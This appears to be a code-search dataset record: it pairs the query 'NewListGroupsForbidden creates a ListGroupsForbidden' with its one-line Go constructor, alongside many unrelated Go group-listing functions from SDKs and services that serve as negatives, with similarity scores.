ggSession.greengrass.GetGroup(&greengrass.GetGroupInput{\n\t\tGroupId: &id,\n\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\tfmt.Printf(\"group: %v\\n\", group)\n\n\tif group.LatestVersion == nil {\n\t\treturn nil\n\t}\n\n\tgroupVersion, err := ggSession.greengrass.GetGroupVersion(&greengrass.GetGroupVersionInput{\n\t\tGroupId: group.Id,\n\t\tGroupVersionId: group.LatestVersion,\n\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\tfmt.Printf(\"group version: %v\\n\", groupVersion)\n\n\treturn nil\n}", "func (db *MySQLDB) ListGroups(ctx context.Context, tenant *Tenant, request *helper.PageRequest) ([]*Group, *helper.Page, error) {\n\tfLog := mysqlLog.WithField(\"func\", \"ListGroups\").WithField(\"RequestID\", ctx.Value(constants.RequestID))\n\tq := \"SELECT COUNT(*) AS CNT FROM HANSIP_GROUP\"\n\tret := make([]*Group, 0)\n\trow := db.instance.QueryRowContext(ctx, q)\n\tcount := 0\n\terr := row.Scan(&count)\n\tif err != nil {\n\t\tif err == sql.ErrNoRows {\n\t\t\treturn ret, helper.NewPage(request, uint(count)), nil\n\t\t}\n\t\tfLog.Errorf(\"row.Scan got %s\", err.Error())\n\t\treturn nil, nil, &ErrDBScanError{\n\t\t\tWrapped: err,\n\t\t\tMessage: \"Error ListGroups\",\n\t\t\tSQL: q,\n\t\t}\n\t}\n\tpage := helper.NewPage(request, uint(count))\n\tq = fmt.Sprintf(\"SELECT REC_ID, GROUP_NAME, GROUP_DOMAIN, DESCRIPTION FROM HANSIP_GROUP WHERE GROUP_DOMAIN=? ORDER BY GROUP_NAME %s LIMIT %d, %d\", request.Sort, page.OffsetStart, page.OffsetEnd-page.OffsetStart)\n\trows, err := db.instance.QueryContext(ctx, q, tenant.Domain)\n\tif err != nil {\n\t\tfLog.Errorf(\"db.instance.QueryContext got %s. SQL = %s\", err.Error(), q)\n\t\treturn nil, nil, &ErrDBQueryError{\n\t\t\tWrapped: err,\n\t\t\tMessage: \"Error ListGroups\",\n\t\t\tSQL: q,\n\t\t}\n\t}\n\tdefer rows.Close()\n\tfor rows.Next() {\n\t\tr := &Group{}\n\t\terr := rows.Scan(&r.RecID, &r.GroupName, &r.GroupDomain, &r.Description)\n\t\tif err != nil {\n\t\t\tfLog.Warnf(\"row.Scan got %s\", err.Error())\n\t\t\treturn nil, nil, &ErrDBScanError{\n\t\t\t\tWrapped: err,\n\t\t\t\tMessage: \"Error ListGroups\",\n\t\t\t\tSQL: q,\n\t\t\t}\n\t\t} else {\n\t\t\tret = append(ret, r)\n\t\t}\n\t}\n\treturn ret, page, nil\n}", "func List(c messagebird.Client, options *messagebird.PaginationRequest) (*Groups, error) {\n\tgroupList := &Groups{}\n\tif err := c.Request(groupList, http.MethodGet, path+\"?\"+options.QueryParams(), nil); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn groupList, nil\n}", "func NewAddServerGroupBadRequest() *AddServerGroupBadRequest {\n\treturn &AddServerGroupBadRequest{}\n}", "func NewDescribeGroupsResponse(payload []byte) (*DescribeGroupsResponse, error) {\n\tvar (\n\t\terr error = nil\n\t\tl int\n\t\toffset int = 0\n\t)\n\tr := &DescribeGroupsResponse{}\n\tresponseLength := int(binary.BigEndian.Uint32(payload))\n\tif responseLength+4 != len(payload) {\n\t\treturn nil, fmt.Errorf(\"describeGroups reseponse length did not match: %d!=%d\", responseLength+4, len(payload))\n\t}\n\toffset += 4\n\n\tr.CorrelationID = uint32(binary.BigEndian.Uint32(payload[offset:]))\n\toffset += 4\n\n\tgroupCount := uint32(binary.BigEndian.Uint32(payload[offset:]))\n\toffset += 4\n\n\tr.Groups = make([]*GroupDetail, groupCount)\n\n\tfor i := range r.Groups {\n\t\tgroup := &GroupDetail{}\n\n\t\tgroup.ErrorCode = int16(binary.BigEndian.Uint16(payload[offset:]))\n\t\toffset += 2\n\n\t\tif err == nil && group.ErrorCode != 0 {\n\t\t\terr = getErrorFromErrorCode(group.ErrorCode)\n\t\t}\n\n\t\tl = int(binary.BigEndian.Uint16(payload[offset:]))\n\t\toffset += 2\n\t\tgroup.GroupID = string(payload[offset : offset+l])\n\t\toffset += l\n\n\t\tl = int(binary.BigEndian.Uint16(payload[offset:]))\n\t\toffset += 2\n\t\tgroup.State = string(payload[offset : offset+l])\n\t\toffset += l\n\n\t\tl = int(binary.BigEndian.Uint16(payload[offset:]))\n\t\toffset += 2\n\t\tgroup.ProtocolType = string(payload[offset : offset+l])\n\t\toffset += l\n\n\t\tl = int(binary.BigEndian.Uint16(payload[offset:]))\n\t\toffset += 2\n\t\tgroup.Protocol = string(payload[offset : offset+l])\n\t\toffset += l\n\n\t\tmemberCount := int(binary.BigEndian.Uint32(payload[offset:]))\n\t\toffset += 4\n\n\t\tgroup.Members = make([]*MemberDetail, memberCount)\n\n\t\tfor i := range group.Members {\n\t\t\tgroup.Members[i] = &MemberDetail{}\n\n\t\t\tl = int(binary.BigEndian.Uint16(payload[offset:]))\n\t\t\toffset += 2\n\t\t\tgroup.Members[i].MemberID = string(payload[offset : offset+l])\n\t\t\toffset += l\n\n\t\t\tl = int(binary.BigEndian.Uint16(payload[offset:]))\n\t\t\toffset += 2\n\t\t\tgroup.Members[i].ClientID = string(payload[offset : offset+l])\n\t\t\toffset += l\n\n\t\t\tl = int(binary.BigEndian.Uint16(payload[offset:]))\n\t\t\toffset += 2\n\t\t\tgroup.Members[i].ClientHost = string(payload[offset : offset+l])\n\t\t\toffset += l\n\n\t\t\tl = int(binary.BigEndian.Uint32(payload[offset:]))\n\t\t\toffset += 4\n\t\t\tcopy(group.Members[i].MemberMetadata, payload[offset:offset+l])\n\t\t\toffset += l\n\n\t\t\tl = int(binary.BigEndian.Uint32(payload[offset:]))\n\t\t\toffset += 4\n\t\t\tgroup.Members[i].MemberAssignment = make([]byte, l)\n\t\t\tcopy(group.Members[i].MemberAssignment, payload[offset:offset+l])\n\t\t\toffset += l\n\t\t}\n\n\t\tr.Groups[i] = group\n\t}\n\n\treturn r, err\n}", "func CreateListExperimentGroupsResponse() (response *ListExperimentGroupsResponse) {\n\tresponse = &ListExperimentGroupsResponse{\n\t\tBaseResponse: &responses.BaseResponse{},\n\t}\n\treturn\n}", "func ListUserGroup(w http.ResponseWriter, r *http.Request) {\n\tfLog := userMgmtLogger.WithField(\"func\", \"ListUserGroup\").WithField(\"RequestID\", r.Context().Value(constants.RequestID)).WithField(\"path\", r.URL.Path).WithField(\"method\", r.Method)\n\n\tiauthctx := r.Context().Value(constants.HansipAuthentication)\n\tif iauthctx == nil {\n\t\thelper.WriteHTTPResponse(r.Context(), w, http.StatusUnauthorized, \"You are not authorized to access this resource\", nil, nil)\n\t\treturn\n\t}\n\n\tparams, err := helper.ParsePathParams(fmt.Sprintf(\"%s/management/user/{userRecId}/groups\", apiPrefix), r.URL.Path)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tuser, err := UserRepo.GetUserByRecID(r.Context(), params[\"userRecId\"])\n\tif err != nil {\n\t\tfLog.Errorf(\"UserRepo.GetUserByRecID got %s\", err.Error())\n\t\thelper.WriteHTTPResponse(r.Context(), w, http.StatusInternalServerError, err.Error(), nil, nil)\n\t\treturn\n\t}\n\tif user == nil {\n\t\thelper.WriteHTTPResponse(r.Context(), w, http.StatusNotFound, fmt.Sprintf(\"User recid %s not found\", params[\"userRecId\"]), nil, nil)\n\t\treturn\n\t}\n\n\tpageRequest, err := helper.NewPageRequestFromRequest(r)\n\tif err != nil {\n\t\tfLog.Errorf(\"helper.NewPageRequestFromRequest got %s\", err.Error())\n\t\thelper.WriteHTTPResponse(r.Context(), w, http.StatusBadRequest, err.Error(), nil, nil)\n\t\treturn\n\t}\n\tgroups, page, err := UserGroupRepo.ListUserGroupByUser(r.Context(), user, pageRequest)\n\tif err != nil {\n\t\tfLog.Errorf(\"UserGroupRepo.ListUserGroupByUser got %s\", err.Error())\n\t}\n\tsgroups := make([]*SimpleGroup, len(groups))\n\tfor k, v := range groups {\n\t\tsgroups[k] = &SimpleGroup{\n\t\t\tRecID: v.RecID,\n\t\t\tGroupName: v.GroupName,\n\t\t}\n\t}\n\tret := make(map[string]interface{})\n\tret[\"groups\"] = sgroups\n\tret[\"page\"] = page\n\thelper.WriteHTTPResponse(r.Context(), w, http.StatusOK, \"List of groups paginated\", nil, ret)\n}", "func NewListPaginatedBadRequest() *ListPaginatedBadRequest {\n\treturn &ListPaginatedBadRequest{}\n}", "func (client IdentityClient) listGroups(ctx context.Context, request common.OCIRequest, binaryReqBody *common.OCIReadSeekCloser, extraHeaders map[string]string) (common.OCIResponse, error) {\n\n\thttpRequest, err := request.HTTPRequest(http.MethodGet, \"/groups\", binaryReqBody, extraHeaders)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response ListGroupsResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func NewCreateVMPlacementGroupBadRequest() *CreateVMPlacementGroupBadRequest {\n\treturn &CreateVMPlacementGroupBadRequest{}\n}", "func (o *GetAviServiceEngineGroupsBadRequest) WithPayload(payload *models.Error) *GetAviServiceEngineGroupsBadRequest {\n\to.Payload = payload\n\treturn o\n}", "func (o *AddServerGroupBadRequest) Code() int {\n\treturn 400\n}", "func (client *LocalRulestacksClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *LocalRulestacksClientListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/PaloAltoNetworks.Cloudngfw/localRulestacks\"\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2022-08-29\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func NewGetHostGroupsNotFound() *GetHostGroupsNotFound {\n\treturn &GetHostGroupsNotFound{}\n}", "func (s *GroupsService) List(ctx context.Context, opts *PagingOptions) (*GroupList, error) {\n\tquery := addPaging(url.Values{}, opts)\n\treq, err := s.Client.NewRequest(ctx, http.MethodGet, newURI(groupsURI), WithQuery(query))\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"list groups failed: , %w\", err)\n\t}\n\tres, resp, err := s.Client.Do(req)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"list groups failed: , %w\", err)\n\t}\n\n\tif resp != nil && resp.StatusCode == http.StatusNotFound {\n\t\treturn nil, ErrNotFound\n\t}\n\n\tg := &GroupList{\n\t\tGroups: []*Group{},\n\t}\n\tif err := json.Unmarshal(res, g); err != nil {\n\t\treturn nil, fmt.Errorf(\"list groups failed, unable to unmarshal repository list json: , %w\", err)\n\t}\n\n\tfor _, r := range g.GetGroups() {\n\t\tr.Session.set(resp)\n\t}\n\n\treturn g, nil\n}", "func (capi ClientAPI) Groups(conf map[string]string) error {\n\n\turl := fmt.Sprintf(\"http://%s:%s/v1/groups\", conf[\"host\"], conf[\"port\"])\n\n\t// Build the request\n\treq, err := http.NewRequest(\"GET\", url, nil)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Send the request via a client\n\tclient := &http.Client{}\n\tresp, err := client.Do(req)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Defer the closing of the body\n\tdefer resp.Body.Close()\n\t// Read the content into a byte array\n\tbody, err := ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Marshal API data into map\n\tvar groupmap map[string]string\n\terr = json.Unmarshal(body, &groupmap)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tw := new(tabwriter.Writer)\n\n\t// Format in tab-separated columns with a tab stop of 8.\n\tw.Init(os.Stdout, 0, 8, 0, '\\t', 0)\n\tfmt.Fprintln(w, \"UUID\\tGROUP NAME\")\n\n\tfor agentUUID, groupName := range groupmap {\n\t\tfmt.Fprintf(\n\t\t\tw,\n\t\t\t\"%s\\t%s\\n\",\n\t\t\thostresources.TruncateID(agentUUID),\n\t\t\tgroupName,\n\t\t)\n\t}\n\tfmt.Fprintln(w)\n\tw.Flush()\n\n\treturn nil\n\n}", "func (o *PostVolumeGroupsListDefault) Code() int {\n\treturn o._statusCode\n}", "func (a *Client) UserGroupsList(params *UserGroupsListParams, authInfo runtime.ClientAuthInfoWriter) (*UserGroupsListOK, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewUserGroupsListParams()\n\t}\n\n\tresult, err := a.transport.Submit(&runtime.ClientOperation{\n\t\tID: \"user_groups_list\",\n\t\tMethod: \"GET\",\n\t\tPathPattern: \"/v3/customer/core/user_groups/\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"https\"},\n\t\tParams: params,\n\t\tReader: &UserGroupsListReader{formats: a.formats},\n\t\tAuthInfo: authInfo,\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tsuccess, ok := result.(*UserGroupsListOK)\n\tif ok {\n\t\treturn success, nil\n\t}\n\t// unexpected success response\n\t// safeguard: normally, absent a default response, unknown success responses return an error above: so this is a codegen issue\n\tmsg := fmt.Sprintf(\"unexpected success response for user_groups_list: API contract not enforced by server. Client expected to get an error, but got: %T\", result)\n\tpanic(msg)\n}", "func (client WorkloadNetworksClient) ListVMGroupsResponder(resp *http.Response) (result WorkloadNetworkVMGroupsList, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK),\n\t\tautorest.ByUnmarshallingJSON(&result),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func (m *AccessPackage) SetIncompatibleGroups(value []Groupable)() {\n m.incompatibleGroups = value\n}", "func (c *MockResourceGroupsClient) List(ctx context.Context, filter string) ([]resources.Group, error) {\n\tif filter != \"\" {\n\t\treturn nil, fmt.Errorf(\"unsupported non-empty filter: %s\", filter)\n\t}\n\tvar l []resources.Group\n\tfor _, rg := range c.RGs {\n\t\tl = append(l, rg)\n\t}\n\treturn l, nil\n}", "func (client *MetricAlertsClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *MetricAlertsClientListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Insights/metricAlerts\"\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2018-03-01\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func NewListProvidersBadRequest() *ListProvidersBadRequest {\n\treturn &ListProvidersBadRequest{}\n}", "func (o *GetUniverseGroupsGroupIDNotFoundBody) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := o.validateError(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func handleGetGroupsStatus(c *Context, w http.ResponseWriter, r *http.Request) {\n\tfilter := &model.GroupFilter{\n\t\tPaging: model.AllPagesNotDeleted(),\n\t}\n\n\tgroups, err := c.Store.GetGroups(filter)\n\tif err != nil {\n\t\tc.Logger.WithError(err).Error(\"failed to query groups\")\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\treturn\n\t}\n\tif groups == nil {\n\t\tw.WriteHeader(http.StatusNotFound)\n\t\treturn\n\t}\n\n\tvar groupsStatus []model.GroupsStatus\n\n\tfor _, group := range groups {\n\t\tvar groupStatus model.GroupsStatus\n\t\tstatus, err := c.Store.GetGroupStatus(group.ID)\n\t\tif err != nil {\n\t\t\tc.Logger.WithError(err).Error(\"failed to query group status\")\n\t\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\t\treturn\n\t\t}\n\t\tif status == nil {\n\t\t\tcontinue\n\t\t}\n\n\t\tgroupStatus.ID = group.ID\n\t\tgroupStatus.Status = *status\n\n\t\tgroupsStatus = append(groupsStatus, groupStatus)\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(http.StatusOK)\n\toutputJSON(c, w, groupsStatus)\n}", "func NewListTeamsBadRequest() *ListTeamsBadRequest {\n\treturn &ListTeamsBadRequest{}\n}", "func NewListOrganizationsBadRequest() *ListOrganizationsBadRequest {\n\treturn &ListOrganizationsBadRequest{}\n}", "func NewListPrioritiesBadRequest() *ListPrioritiesBadRequest {\n\treturn &ListPrioritiesBadRequest{}\n}", "func (q *QueryGVR) resourceListInGroup(resourceLists []*metav1.APIResourceList, group string) ([]*metav1.APIResourceList, error) {\n\tvar list []*metav1.APIResourceList\n\tfor _, rscList := range resourceLists {\n\t\tgv, err := schema.ParseGroupVersion(rscList.GroupVersion)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tif strings.EqualFold(gv.Group, group) {\n\t\t\tlist = append(list, rscList)\n\t\t}\n\t}\n\treturn list, nil\n}", "func TestListIamGroups(t *testing.T) {\n\tt.Parallel()\n\n\tregion, err := getRandomRegion()\n\trequire.NoError(t, err)\n\n\tlocalSession, err := session.NewSession(&awsgo.Config{\n\t\tRegion: awsgo.String(region),\n\t})\n\trequire.NoError(t, err)\n\n\tgroupNames, err := getAllIamGroups(localSession, time.Now(), config.Config{})\n\trequire.NoError(t, err)\n\tassert.NotEmpty(t, groupNames)\n}", "func NewGroups(filename string, bad BadLineHandler) (*HTGroup, error) {\n\thtGroup := HTGroup{\n\t\tfilePath: filename,\n\t}\n\treturn &htGroup, htGroup.ReloadGroups(bad)\n}", "func (client IdentityClient) listDynamicGroups(ctx context.Context, request common.OCIRequest, binaryReqBody *common.OCIReadSeekCloser, extraHeaders map[string]string) (common.OCIResponse, error) {\n\n\thttpRequest, err := request.HTTPRequest(http.MethodGet, \"/dynamicGroups\", binaryReqBody, extraHeaders)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response ListDynamicGroupsResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}" ]
[ "0.7203379", "0.6827672", "0.6800662", "0.6767549", "0.65069234", "0.6362982", "0.6343974", "0.6341393", "0.6338169", "0.61313295", "0.6129404", "0.6056113", "0.60408044", "0.6037293", "0.60331726", "0.6015777", "0.5988406", "0.591956", "0.5843401", "0.5837527", "0.58244187", "0.58183676", "0.581339", "0.5811094", "0.57788473", "0.57504964", "0.5705735", "0.5676316", "0.5661241", "0.56479883", "0.56465256", "0.5621152", "0.55789286", "0.55788314", "0.5563469", "0.5554078", "0.55224967", "0.5507333", "0.55007964", "0.5477795", "0.5451631", "0.5443613", "0.54313976", "0.5430643", "0.5426099", "0.54249626", "0.5415829", "0.538802", "0.53796756", "0.53733087", "0.53685075", "0.5367921", "0.53553396", "0.53471863", "0.533469", "0.53307813", "0.53307813", "0.53150386", "0.5312545", "0.5311519", "0.52995044", "0.5298925", "0.52966297", "0.5285688", "0.52776057", "0.5261329", "0.5260712", "0.5229968", "0.5219416", "0.5218027", "0.52165926", "0.5216363", "0.5206988", "0.5204463", "0.52042747", "0.5202854", "0.5199073", "0.5199005", "0.5196995", "0.51862484", "0.5185724", "0.51717037", "0.5171066", "0.51691186", "0.5168337", "0.5164545", "0.5163116", "0.51450396", "0.5144002", "0.51360816", "0.51323885", "0.5128874", "0.5128042", "0.5126315", "0.5123396", "0.511231", "0.5109341", "0.51039433", "0.5096027", "0.50897664" ]
0.8323626
0
NewListGroupsForbidden creates a ListGroupsForbidden with default headers values
func NewListGroupsForbidden() *ListGroupsForbidden { return &ListGroupsForbidden{} }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func NewListGroupsBadRequest() *ListGroupsBadRequest {\n\treturn &ListGroupsBadRequest{}\n}", "func NewGetHostGroupsForbidden() *GetHostGroupsForbidden {\n\treturn &GetHostGroupsForbidden{}\n}", "func getGroups(w http.ResponseWriter, r *http.Request) {\n InitResponse(&w)\n if r.Method == \"OPTIONS\" {return}\n\n allow, _ := HasPermission(&w, r, CoreGroupModuleID, CoreAccessRead)\n if !allow {\n w.WriteHeader(http.StatusUnauthorized)\n json.NewEncoder(w).Encode(&CoreMessage{\n Message: \"Not authorized!\",\n })\n return\n }\n\n groups := []CoreGroup{}\n\n err := Db.Model(&groups).Select()\n if err != nil {\n w.WriteHeader(http.StatusBadRequest)\n return\n }\n\n w.WriteHeader(http.StatusOK)\n json.NewEncoder(w).Encode(groups)\n}", "func NewListGroupsNotFound() *ListGroupsNotFound {\n\treturn &ListGroupsNotFound{}\n}", "func NewListGroupsDefault(code int) *ListGroupsDefault {\n\treturn &ListGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func CreateListServerGroupsRequest() (request *ListServerGroupsRequest) {\n\trequest = &ListServerGroupsRequest{\n\t\tRpcRequest: &requests.RpcRequest{},\n\t}\n\trequest.InitWithApiInfo(\"Alb\", \"2020-06-16\", \"ListServerGroups\", \"alb\", \"openAPI\")\n\trequest.Method = requests.POST\n\treturn\n}", "func NewUpdateHostGroupsForbidden() *UpdateHostGroupsForbidden {\n\treturn &UpdateHostGroupsForbidden{}\n}", "func NewListRegistryForbidden() *ListRegistryForbidden {\n\treturn &ListRegistryForbidden{}\n}", "func NewListServerGroupBadRequest() *ListServerGroupBadRequest {\n\treturn &ListServerGroupBadRequest{}\n}", "func (c *GroupController) List(ctx *app.ListGroupContext) error {\n\t// GroupController_List: start_implement\n\n\tdataStore := &dal.DataStore{}\n\tdataStore.GetSession()\n\t// Close the session\n\tdefer dataStore.Close()\n\tdc := dal.NewDalGroup(dataStore)\n\n\tgroups, err := dc.FetchAll()\n\n\tif err != nil {\n\t\tctx.ResponseData.Service.LogError(\"InternalServerError\", \"req_id\", middleware.ContextRequestID(ctx), \"ctrl\", \"Group\", \"action\", \"List\", ctx.RequestData.Request.Method, ctx.RequestData.Request.URL, \"databaseError\", err.Error())\n\t\treturn ctx.InternalServerError()\n\t}\n\n\tres := make(app.GwentapiGroupCollection, len(*groups))\n\n\tlastModified := time.Time{}\n\tfor i, group := range *groups {\n\t\tg, _ := factory.CreateGroup(&group)\n\n\t\tif lastModified.Before(group.Last_Modified) {\n\t\t\tlastModified = group.Last_Modified\n\t\t}\n\n\t\tres[i] = g\n\t}\n\n\t// GroupController_List: end_implement\n\thelpers.LastModified(ctx.ResponseData, lastModified)\n\tif ctx.IfModifiedSince != nil {\n\t\tif !helpers.IsModified(*ctx.IfModifiedSince, lastModified) {\n\t\t\treturn ctx.NotModified()\n\t\t}\n\t}\n\treturn ctx.OK(res)\n}", "func (client IdentityClient) ListDynamicGroups(ctx context.Context, request ListDynamicGroupsRequest) (response ListDynamicGroupsResponse, err error) {\n\tvar ociResponse common.OCIResponse\n\tpolicy := common.NoRetryPolicy()\n\tif client.RetryPolicy() != nil {\n\t\tpolicy = *client.RetryPolicy()\n\t}\n\tif request.RetryPolicy() != nil {\n\t\tpolicy = *request.RetryPolicy()\n\t}\n\tociResponse, err = common.Retry(ctx, request, client.listDynamicGroups, policy)\n\tif err != nil {\n\t\tif ociResponse != nil {\n\t\t\tif httpResponse := ociResponse.HTTPResponse(); httpResponse != nil {\n\t\t\t\topcRequestId := httpResponse.Header.Get(\"opc-request-id\")\n\t\t\t\tresponse = ListDynamicGroupsResponse{RawResponse: httpResponse, OpcRequestId: &opcRequestId}\n\t\t\t} else {\n\t\t\t\tresponse = ListDynamicGroupsResponse{}\n\t\t\t}\n\t\t}\n\t\treturn\n\t}\n\tif convertedResponse, ok := ociResponse.(ListDynamicGroupsResponse); ok {\n\t\tresponse = convertedResponse\n\t} else {\n\t\terr = fmt.Errorf(\"failed to convert OCIResponse into ListDynamicGroupsResponse\")\n\t}\n\treturn\n}", "func (client *ClustersClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *ClustersClientListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DBforPostgreSQL/serverGroupsv2\"\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2022-11-08\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func NewGetUsergroupsGroupIDForbidden() *GetUsergroupsGroupIDForbidden {\n\treturn &GetUsergroupsGroupIDForbidden{}\n}", "func (client IdentityClient) ListGroups(ctx context.Context, request ListGroupsRequest) (response ListGroupsResponse, err error) {\n\tvar ociResponse common.OCIResponse\n\tpolicy := common.NoRetryPolicy()\n\tif client.RetryPolicy() != nil {\n\t\tpolicy = *client.RetryPolicy()\n\t}\n\tif request.RetryPolicy() != nil {\n\t\tpolicy = *request.RetryPolicy()\n\t}\n\tociResponse, err = common.Retry(ctx, request, client.listGroups, policy)\n\tif err != nil {\n\t\tif ociResponse != nil {\n\t\t\tif httpResponse := ociResponse.HTTPResponse(); httpResponse != nil {\n\t\t\t\topcRequestId := httpResponse.Header.Get(\"opc-request-id\")\n\t\t\t\tresponse = ListGroupsResponse{RawResponse: httpResponse, OpcRequestId: &opcRequestId}\n\t\t\t} else {\n\t\t\t\tresponse = ListGroupsResponse{}\n\t\t\t}\n\t\t}\n\t\treturn\n\t}\n\tif convertedResponse, ok := ociResponse.(ListGroupsResponse); ok {\n\t\tresponse = convertedResponse\n\t} else {\n\t\terr = fmt.Errorf(\"failed to convert OCIResponse into ListGroupsResponse\")\n\t}\n\treturn\n}", "func (c *DefaultIdentityProvider) ListGroups(ctx context.Context, options *metainternal.ListOptions) (*auth.GroupList, error) {\n\tkeyword := \"\"\n\tlimit := 50\n\tif options.FieldSelector != nil {\n\t\tkeyword, _ = options.FieldSelector.RequiresExactMatch(auth.KeywordQueryTag)\n\t\tlimitStr, _ := options.FieldSelector.RequiresExactMatch(auth.QueryLimitTag)\n\t\tif li, err := strconv.Atoi(limitStr); err == nil && li > 0 {\n\t\t\tlimit = li\n\t\t}\n\t}\n\n\t_, tenantID := authentication.GetUsernameAndTenantID(ctx)\n\tif tenantID != \"\" && tenantID != c.tenantID {\n\t\treturn nil, apierrors.NewBadRequest(\"must in the same tenant\")\n\t}\n\n\tallList, err := c.localGroupLister.List(labels.Everything())\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar localGroupList []*authv1.LocalGroup\n\tfor i, item := range allList {\n\t\tif item.Spec.TenantID == c.tenantID {\n\t\t\tlocalGroupList = append(localGroupList, allList[i])\n\t\t}\n\t}\n\n\tif keyword != \"\" {\n\t\tvar newList []*authv1.LocalGroup\n\t\tfor i, val := range localGroupList {\n\t\t\tif strings.Contains(val.Name, keyword) || strings.Contains(val.Spec.DisplayName, keyword) {\n\t\t\t\tnewList = append(newList, localGroupList[i])\n\t\t\t}\n\t\t}\n\t\tlocalGroupList = newList\n\t}\n\n\titems := localGroupList[0:min(len(localGroupList), limit)]\n\n\tgroupList := auth.GroupList{}\n\tfor _, item := range items {\n\t\tgroup := convertToGroup(item)\n\t\tgroupList.Items = append(groupList.Items, group)\n\t}\n\n\treturn &groupList, nil\n}", "func NewGetCustomerGroupsForbidden() *GetCustomerGroupsForbidden {\n\treturn &GetCustomerGroupsForbidden{}\n}", "func NewQueryUserGroupsForbidden() 